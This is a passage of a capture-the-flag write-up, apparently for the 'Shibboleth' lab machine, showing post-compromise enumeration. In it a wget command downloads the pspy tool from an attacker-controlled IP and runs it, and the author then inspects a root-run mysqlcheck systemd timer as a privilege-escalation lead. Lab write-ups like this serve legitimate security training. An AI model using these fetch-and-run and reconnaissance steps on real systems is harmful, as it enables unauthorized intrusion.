Shibboleth_PSPY

PSPY

---

A root cronjob process was discovered

zabbix@shibboleth:/dev/shm$ wget -q http://10.10.14.7/pspy64 ; chmod 755 ./pspy64

Delivery complete

zabbix@shibboleth:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

Executing PSPY

mysqlcheck.timer

---

While the root cronjob process didn’t appear to execute any command, there is a root udev process executing something This was listed in the enumeration earlier as well; mysqlcheck.timer

ipmi-svc@shibboleth:/dev/shm$ systemctl status mysqlcheck.timer
systemctl status mysqlcheck.timer
● mysqlcheck.timer - Start mysqlcheck service
     Loaded: loaded (/etc/systemd/system/mysqlcheck.timer; enabled; vendor preset: enabled)
     Active: active (waiting) since Mon 2023-04-17 18:26:28 BST; 3h 56min ago
    Trigger: Mon 2023-04-17 22:23:20 BST; 2s left
   Triggers: ● mysqlcheck.service
 
Warning: some journal files were not opened due to insufficient permissions.

The systemd timer is located at /etc/systemd/system/ directory

ipmi-svc@shibboleth:/dev/shm$ ll /etc/systemd/system/mysqlcheck*
4.0K -rw-r--r-- 1 root root 195 Oct 16  2021 /etc/systemd/system/mysqlcheck.timer
4.0K -rw-r--r-- 1 root root 230 Oct 15  2021 /etc/systemd/system/mysqlcheck.service

There are the service and timer file

ipmi-svc@shibboleth:/dev/shm$ cat /etc/systemd/system/mysqlcheck.service
# Restart mysql daemon if not responding
#
 
[Unit]
Description=Check MySQL daemon and restart it if necessary
Wants=mysqlcheck.timer
 
[Service]
Type=oneshot
ExecStart=/root/scripts/mysqlcheck
 
[Install]
WantedBy=multi-user.target
ipmi-svc@shibboleth:/dev/shm$ cat /etc/systemd/system/mysqlcheck.timer
cat /etc/systemd/system/mysqlcheck.timer
# mysqlcheck timer
#
 
[Unit]
Description=Start mysqlcheck service
Requires=mysqlcheck.service
 
[Timer]
Unit=mysqlcheck.service
OnUnitInactiveSec=5s
OnBootSec=5s
 
[Install]
WantedBy=timers.target

So the service is executing a script located at root/scripts/mysqlcheck every 5 seconds Additionally the script is executing the following argument -e SELECT 1